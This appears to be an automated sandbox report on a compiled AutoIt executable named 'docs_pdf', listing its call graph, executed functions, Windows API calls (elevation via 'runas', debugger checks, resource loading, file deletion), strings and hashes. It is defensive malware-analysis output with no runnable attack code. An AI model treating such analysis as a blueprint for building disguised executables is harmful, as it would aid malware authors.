100535->100527 100536->100527 100537->100527 100538->100527 100539->100527 100540->100523 100541 fb1066 100546 fbf8cf 100541->100546 100543 fb106c 100544 fd2f80 __cinit 67 API calls 100543->100544 100545 fb1076 100544->100545 100547 fbf8f0 100546->100547 100579 fd0143 100547->100579 100551 fbf937 100552 fb77c7 59 API calls 100551->100552 100553 fbf941 100552->100553 100554 fb77c7 59 API calls 100553->100554 100555 fbf94b 100554->100555 100556 fb77c7 59 API calls 100555->100556 100557 fbf955 100556->100557 100558 fb77c7 59 API calls 100557->100558 100559 fbf993 100558->100559 100560 fb77c7 59 API calls 100559->100560 100561 fbfa5e 100560->100561 100589 fc60e7 100561->100589 100565 fbfa90 100566 fb77c7 59 API calls 100565->100566 100567 fbfa9a 100566->100567 100617 fcffde 100567->100617 100569 fbfae1 100570 fbfaf1 GetStdHandle 100569->100570 100571 fbfb3d 100570->100571 100572 ff49d5 100570->100572 100574 fbfb45 OleInitialize 100571->100574 100572->100571 100573 ff49de 100572->100573 100624 1016dda 64 API calls Mailbox 100573->100624 100574->100543 100576 ff49e5 100625 10174a9 CreateThread 100576->100625 100578 ff49f1 CloseHandle 100578->100574 100626 fd021c 100579->100626 100582 fd021c 59 API calls 100583 fd0185 100582->100583 100584 fb77c7 59 API calls 100583->100584 100585 fd0191 100584->100585 100586 fb7d2c 59 API calls 100585->100586 100587 fbf8f6 100586->100587 100588 fd03a2 6 API calls 100587->100588 100588->100551 100590 fb77c7 59 API calls 100589->100590 100591 fc60f7 100590->100591 100592 fb77c7 59 API calls 100591->100592 100593 fc60ff 100592->100593 100633 fc5bfd 100593->100633 100596 fc5bfd 59 API calls 100597 fc610f 100596->100597 100598 fb77c7 59 API calls 100597->100598 100599 fc611a 100598->100599 100600 fd0ff6 Mailbox 59 API calls 100599->100600 100601 fbfa68 100600->100601 100602 fc6259 100601->100602 100603 fc6267 100602->100603 100604 fb77c7 59 API calls 100603->100604 100605 fc6272 100604->100605 100606 fb77c7 59 API calls 100605->100606 100607 fc627d 100606->100607 100608 fb77c7 59 API calls 100607->100608 100609 fc6288 100608->100609 100610 fb77c7 59 API calls 100609->100610 100611 fc6293 100610->100611 100612 fc5bfd 59 API calls 100611->100612 100613 fc629e 100612->100613 100614 fd0ff6 Mailbox 59 API calls 100613->100614 100615 fc62a5 RegisterWindowMessageW 100614->100615 100615->100565 100618 fcffee 100617->100618 100619 1005cc3 100617->100619 100621 fd0ff6 Mailbox 59 API calls 100618->100621 100636 1019d71 60 API calls 100619->100636 100623 fcfff6 100621->100623 100622 1005cce 100623->100569 100624->100576 100625->100578 100637 101748f 65 API calls 100625->100637 100627 fb77c7 59 API calls 100626->100627 100628 fd0227 100627->100628 100629 fb77c7 59 API calls 100628->100629 100630 fd022f 100629->100630 100631 fb77c7 59 API calls 100630->100631 100632 fd017b 100631->100632 100632->100582 100634 fb77c7 59 API calls 100633->100634 100635 fc5c05 100634->100635 100635->100596 100636->100622

                                    Executed Functions

                                    Function 00FB3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FB3B7A
                                    • IsDebuggerPresent.KERNEL32 ref: 00FB3B8C
                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,010762F8,010762E0,?,?), ref: 00FB3BFD
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                      • Part of subcall function 00FC0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FB3C26,010762F8,?,?,?), ref: 00FC0ACE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB3C81
                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,010693F0,00000010), ref: 00FED4BC
                                    • SetCurrentDirectoryW.KERNEL32(?,010762F8,?,?,?), ref: 00FED4F4
                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01065D40,010762F8,?,?,?), ref: 00FED57A
                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00FED581
                                      • Part of subcall function 00FB3A58: GetSysColorBrush.USER32(0000000F), ref: 00FB3A62
                                      • Part of subcall function 00FB3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00FB3A71
                                      • Part of subcall function 00FB3A58: LoadIconW.USER32(00000063), ref: 00FB3A88
                                      • Part of subcall function 00FB3A58: LoadIconW.USER32(000000A4), ref: 00FB3A9A
                                      • Part of subcall function 00FB3A58: LoadIconW.USER32(000000A2), ref: 00FB3AAC
                                      • Part of subcall function 00FB3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FB3AD2
                                      • Part of subcall function 00FB3A58: RegisterClassExW.USER32(?), ref: 00FB3B28
                                      • Part of subcall function 00FB39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB3A15
                                      • Part of subcall function 00FB39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB3A36
                                      • Part of subcall function 00FB39E7: ShowWindow.USER32(00000000,?,?), ref: 00FB3A4A
                                      • Part of subcall function 00FB39E7: ShowWindow.USER32(00000000,?,?), ref: 00FB3A53
                                      • Part of subcall function 00FB43DB: _memset.LIBCMT ref: 00FB4401
                                      • Part of subcall function 00FB43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB44A6
                                    Strings
                                    • This is a third-party compiled AutoIt script., xrefs: 00FED4B4
                                    • runas, xrefs: 00FED575
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                    • API String ID: 529118366-3287110873
                                    • Opcode ID: 4a10ae2405f5651a8908cf27d58b203ca674ea5a9a027a37c93db3aa6b67aeb5
                                    • Instruction ID: cd97adf48de32d82a717fab40fe033936971042c4b172a6709a6cf893e815e7e
                                    • Opcode Fuzzy Hash: 4a10ae2405f5651a8908cf27d58b203ca674ea5a9a027a37c93db3aa6b67aeb5
                                    • Instruction Fuzzy Hash: 8F512571D04649AEDB21EBF2DC06EFD7BB8AB44310F044069F492B6151CA7E5606EF21
                                    Function 00FB4AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 996 fb4afe-fb4b5e call fb77c7 GetVersionExW call fb7d2c 1001 fb4c69-fb4c6b 996->1001 1002 fb4b64 996->1002 1003 fedb90-fedb9c 1001->1003 1004 fb4b67-fb4b6c 1002->1004 1005 fedb9d-fedba1 1003->1005 1006 fb4b72 1004->1006 1007 fb4c70-fb4c71 1004->1007 1009 fedba4-fedbb0 1005->1009 1010 fedba3 1005->1010 1008 fb4b73-fb4baa call fb7e8c call fb7886 1006->1008 1007->1008 1018 fedc8d-fedc90 1008->1018 1019 fb4bb0-fb4bb1 1008->1019 1009->1005 1012 fedbb2-fedbb7 1009->1012 1010->1009 1012->1004 1014 fedbbd-fedbc4 1012->1014 1014->1003 1016 fedbc6 1014->1016 1020 fedbcb-fedbce 1016->1020 1021 fedca9-fedcad 1018->1021 1022 fedc92 1018->1022 1019->1020 1023 fb4bb7-fb4bc2 1019->1023 1024 fb4bf1-fb4c08 GetCurrentProcess IsWow64Process 1020->1024 1025 fedbd4-fedbf2 1020->1025 1030 fedcaf-fedcb8 1021->1030 1031 fedc98-fedca1 1021->1031 1026 fedc95 1022->1026 1027 fb4bc8-fb4bca 1023->1027 1028 fedc13-fedc19 1023->1028 1032 fb4c0a 1024->1032 1033 fb4c0d-fb4c1e 1024->1033 1025->1024 1029 fedbf8-fedbfe 1025->1029 1026->1031 1034 fedc2e-fedc3a 1027->1034 1035 fb4bd0-fb4bd3 1027->1035 1038 fedc1b-fedc1e 1028->1038 1039 fedc23-fedc29 1028->1039 1036 fedc08-fedc0e 1029->1036 1037 fedc00-fedc03 1029->1037 1030->1026 1040 fedcba-fedcbd 1030->1040 1031->1021 1032->1033 1041 fb4c89-fb4c93 GetSystemInfo 1033->1041 1042 fb4c20-fb4c30 call fb4c95 1033->1042 1046 fedc3c-fedc3f 1034->1046 1047 fedc44-fedc4a 1034->1047 1043 fb4bd9-fb4be8 1035->1043 1044 fedc5a-fedc5d 1035->1044 1036->1024 1037->1024 1038->1024 1039->1024 1040->1031 1045 fb4c56-fb4c66 1041->1045 1053 fb4c7d-fb4c87 GetSystemInfo 1042->1053 1054 fb4c32-fb4c3f call fb4c95 1042->1054 1049 fedc4f-fedc55 1043->1049 1050 fb4bee 1043->1050 1044->1024 1052 fedc63-fedc78 1044->1052 1046->1024 1047->1024 1049->1024 1050->1024 1055 fedc7a-fedc7d 1052->1055 1056 fedc82-fedc88 1052->1056 1057 fb4c47-fb4c4b 1053->1057 1061 fb4c41-fb4c45 GetNativeSystemInfo 1054->1061 1062 fb4c76-fb4c7b 1054->1062 1055->1024 1056->1024 1057->1045 1059 fb4c4d-fb4c50 FreeLibrary 1057->1059 1059->1045 1061->1057 1062->1061
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 00FB4B2B
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    • GetCurrentProcess.KERNEL32(?,0103FAEC,00000000,00000000,?), ref: 00FB4BF8
                                    • IsWow64Process.KERNEL32(00000000), ref: 00FB4BFF
                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FB4C45
                                    • FreeLibrary.KERNEL32(00000000), ref: 00FB4C50
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00FB4C81
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00FB4C8D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                    • String ID:
                                    • API String ID: 1986165174-0
                                    • Opcode ID: fb04228d53189e76826a716b7b58d6be5964b7d906ac8af9fc2ed993f677d87f
                                    • Instruction ID: 8875c08736bffc27e61d10cdb476defe410106caef771f14b605e2ade2371426
                                    • Opcode Fuzzy Hash: fb04228d53189e76826a716b7b58d6be5964b7d906ac8af9fc2ed993f677d87f
                                    • Instruction Fuzzy Hash: 2891F67194A7C0DEC731CB7985512EAFFE4AF66310B548D5DD0CB83A42D224F908EB5A
                                    Function 00FB4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1063 fb4fe9-fb5001 CreateStreamOnHGlobal 1064 fb5003-fb501a FindResourceExW 1063->1064 1065 fb5021-fb5026 1063->1065 1066 fedd5c-fedd6b LoadResource 1064->1066 1067 fb5020 1064->1067 1066->1067 1068 fedd71-fedd7f SizeofResource 1066->1068 1067->1065 1068->1067 1069 fedd85-fedd90 LockResource 1068->1069 1069->1067 1070 fedd96-feddb4 1069->1070 1070->1067
                                    APIs
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FB4EEE,?,?,00000000,00000000), ref: 00FB4FF9
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FB4EEE,?,?,00000000,00000000), ref: 00FB5010
                                    • LoadResource.KERNEL32(?,00000000,?,?,00FB4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F8F), ref: 00FEDD60
                                    • SizeofResource.KERNEL32(?,00000000,?,?,00FB4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F8F), ref: 00FEDD75
                                    • LockResource.KERNEL32(00FB4EEE,?,?,00FB4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F8F,00000000), ref: 00FEDD88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: bdd186bcd6ecdbdd2464dad3945eb75711a55f1ced7d8be4155946ea8fb1e4ad
                                    • Instruction ID: 1f20d6b0ef7b17ab3246fb0a9d4968276c90cb26afba9b669f7f7f9ecd0bc85b
                                    • Opcode Fuzzy Hash: bdd186bcd6ecdbdd2464dad3945eb75711a55f1ced7d8be4155946ea8fb1e4ad
                                    • Instruction Fuzzy Hash: 30119A75A00B02AFD731AB26DC48F677BBDEBC9B51F20416CF44686250DB66E8009A61
                                    Function 01014696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,00FEE7C1), ref: 010146A6
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 010146B7
                                    • FindClose.KERNEL32(00000000), ref: 010146C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirst
                                    • String ID:
                                    • API String ID: 48322524-0
                                    • Opcode ID: 82f96fb834647089dba9b0ff6cb64e8ac3be2d4ef74fcabd52b641cc8328118d
                                    • Instruction ID: 92fea4eb28da106660aa0c208df51bc02bbed0f3cfefc86e30f597752d422f42
                                    • Opcode Fuzzy Hash: 82f96fb834647089dba9b0ff6cb64e8ac3be2d4ef74fcabd52b641cc8328118d
                                    • Instruction Fuzzy Hash: 8EE0D832D10402DB42206678EC4D8EA779C9F09339F000B45F8F5C20E4EBB859508697
                                    Function 00FBE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                    Download Yara Rule
                                    Strings
                                    • Variable must be of type 'Object'., xrefs: 00FF428C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable must be of type 'Object'.
                                    • API String ID: 0-109567571
                                    • Opcode ID: 492cf0d520f05bef839ef0fdcba40c81d4378893500e007818ba1bd8f02948c6
                                    • Instruction ID: 7dcb119816fea080aeb2218f4a557fd81298a97e124aae23d41f0d5eaa60a7a8
                                    • Opcode Fuzzy Hash: 492cf0d520f05bef839ef0fdcba40c81d4378893500e007818ba1bd8f02948c6
                                    • Instruction Fuzzy Hash: 25A27875E00209CBCB24CF59C880AEAB7B2FF58310F248069E956AB355D735ED46EF91
                                    Function 00FC0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC0BBB
                                    • timeGetTime.WINMM ref: 00FC0E76
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC0FB3
                                    • TranslateMessage.USER32(?), ref: 00FC0FC7
                                    • DispatchMessageW.USER32(?), ref: 00FC0FD5
                                    • Sleep.KERNEL32(0000000A), ref: 00FC0FDF
                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00FC105A
                                    • DestroyWindow.USER32 ref: 00FC1066
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FC1080
                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00FF52AD
                                    • TranslateMessage.USER32(?), ref: 00FF608A
                                    • DispatchMessageW.USER32(?), ref: 00FF6098
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FF60AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                    • API String ID: 4003667617-3242690629
                                    • Opcode ID: 337fc4eff35bd349d1faa8d0229d866784d277cc9453dccc8d97914f5070c0d5
                                    • Instruction ID: 65cba0d70707bab868854bb542d52ceb98635220816936783e4aa112914e6b46
                                    • Opcode Fuzzy Hash: 337fc4eff35bd349d1faa8d0229d866784d277cc9453dccc8d97914f5070c0d5
                                    • Instruction Fuzzy Hash: FCB22570A08742DFD724DF24C885FBAB7E4BF84714F14491DE68A872A1CB75E845EB82
                                    Function 010193DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 010191E9: __time64.LIBCMT ref: 010191F3
                                      • Part of subcall function 00FB5045: _fseek.LIBCMT ref: 00FB505D
                                    • __wsplitpath.LIBCMT ref: 010194BE
                                      • Part of subcall function 00FD432E: __wsplitpath_helper.LIBCMT ref: 00FD436E
                                    • _wcscpy.LIBCMT ref: 010194D1
                                    • _wcscat.LIBCMT ref: 010194E4
                                    • __wsplitpath.LIBCMT ref: 01019509
                                    • _wcscat.LIBCMT ref: 0101951F
                                    • _wcscat.LIBCMT ref: 01019532
                                      • Part of subcall function 0101922F: _memmove.LIBCMT ref: 01019268
                                      • Part of subcall function 0101922F: _memmove.LIBCMT ref: 01019277
                                    • _wcscmp.LIBCMT ref: 01019479
                                      • Part of subcall function 010199BE: _wcscmp.LIBCMT ref: 01019AAE
                                      • Part of subcall function 010199BE: _wcscmp.LIBCMT ref: 01019AC1
                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010196DC
                                    • _wcsncpy.LIBCMT ref: 0101974F
                                    • DeleteFileW.KERNEL32(?,?), ref: 01019785
                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0101979B
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 010197AC
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 010197BE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                    • String ID:
                                    • API String ID: 1500180987-0
                                    • Opcode ID: 0a5c16407c5c7311c7ebfd701351ede40f8c055848570498f5080221a7593296
                                    • Instruction ID: 1fbd63b7872eabe79559d7bd48905276c6a38885b8fafd23f1ac134d2cb6561e
                                    • Opcode Fuzzy Hash: 0a5c16407c5c7311c7ebfd701351ede40f8c055848570498f5080221a7593296
                                    • Instruction Fuzzy Hash: 6CC15CB1D00219AADF21DF95CC81EDEBBBDEF54304F0040AAE649E7245DB389A848F65
                                    Function 00FB3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00FB3074
                                    • RegisterClassExW.USER32(00000030), ref: 00FB309E
                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB30AF
                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FB30CC
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB30DC
                                    • LoadIconW.USER32(000000A9), ref: 00FB30F2
                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB3101
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 2914291525-1005189915
                                    • Opcode ID: e96dba5fcaf70dbb2f105752c451ff38d08545c6c2e724490a6e5cdec003680e
                                    • Instruction ID: e348409fb619847e88792f730fa355fece244815c37d7a151a987a36dce63953
                                    • Opcode Fuzzy Hash: e96dba5fcaf70dbb2f105752c451ff38d08545c6c2e724490a6e5cdec003680e
                                    • Instruction Fuzzy Hash: B73187B1C4430AAFEB61CFA4D884AC9BFF4FB09310F14465AE5C1E6280E3BA4585CF91
                                    Function 00FB3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00FB3074
                                    • RegisterClassExW.USER32(00000030), ref: 00FB309E
                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB30AF
                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FB30CC
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB30DC
                                    • LoadIconW.USER32(000000A9), ref: 00FB30F2
                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB3101
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 2914291525-1005189915
                                    • Opcode ID: a7831d74c8abaf8f8823f1d647dbc1f207f57a002e7f3436c6a2e6516971dd97
                                    • Instruction ID: 819c73d49a43ecd2fc46622264a93dbb10d3e5b578ffc7a650b581640a0ae31a
                                    • Opcode Fuzzy Hash: a7831d74c8abaf8f8823f1d647dbc1f207f57a002e7f3436c6a2e6516971dd97
                                    • Instruction Fuzzy Hash: 7A21C8B1D00619AFEB60DF94E949A9DBBF8FB08700F00451AF591E6294D7BB45448F91
                                    Function 00FB71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00FB4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010762F8,?,00FB37C0,?), ref: 00FB4882
                                      • Part of subcall function 00FD074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FB72C5), ref: 00FD0771
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FB7308
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FEECF1
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FEED32
                                    • RegCloseKey.ADVAPI32(?), ref: 00FEED70
                                    • _wcscat.LIBCMT ref: 00FEEDC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
